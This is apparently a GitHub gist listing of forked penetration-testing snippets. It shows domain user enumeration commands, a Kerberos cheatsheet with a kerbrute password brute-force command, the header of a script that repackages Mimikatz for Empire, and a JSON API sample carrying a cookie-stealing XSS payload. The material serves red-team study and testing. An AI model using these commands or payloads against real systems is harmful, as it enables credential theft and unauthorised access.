Skip to content

Instantly share code, notes, and snippets.

@awsmhacks
awsmhacks / Domain Enumeration Commands
Created August 31, 2020 19:20 — forked from its-a-feature/Domain Enumeration Commands
Common Domain Enumeration commands in Windows, Mac, and LDAP
Domain: TEST.local
User Enumeration:
Windows:
net user
net user /domain
net user [username]
net user [username] /domain
wmic useraccount
Mac:
dscl . ls /Users
@awsmhacks
awsmhacks / kerberos_attacks_cheatsheet.md
Created August 17, 2020 19:26 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@awsmhacks
awsmhacks / Invoke-UpdateMimikatzScript.ps1
Created August 3, 2020 18:24 — forked from ihack4falafel/Invoke-UpdateMimikatzScript.ps1
Convert x64/x86 powerkatz.dll to Base64 string and then update Invoke-Mimikatz.ps1 script from Empire
<#
.Synopsis
Invoke-UpdateMimikatzScript created by Hashim Jawad (@ihack4falafel)
.DESCRIPTION
Convert x64/x86 powerkatz.dll to Base64 string and then update Invoke-Mimikatz.ps1 script from Empire, see the link https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1
.PARAMETER DllPath
Path to powerkatz.dll generated via Visual Studio.
.PARAMETER ScriptPath
Path to Invoke-Mimikatz.ps1 script.
{
"title": "Sample Pet Store App",
"description": "This is a sample server for a pet store.",
"termsOfService": "javascript:alert(document.cookie)",
"contact": {
"name": "API Support",
"url": "asdf",
"email": "asdf"
},
"license": {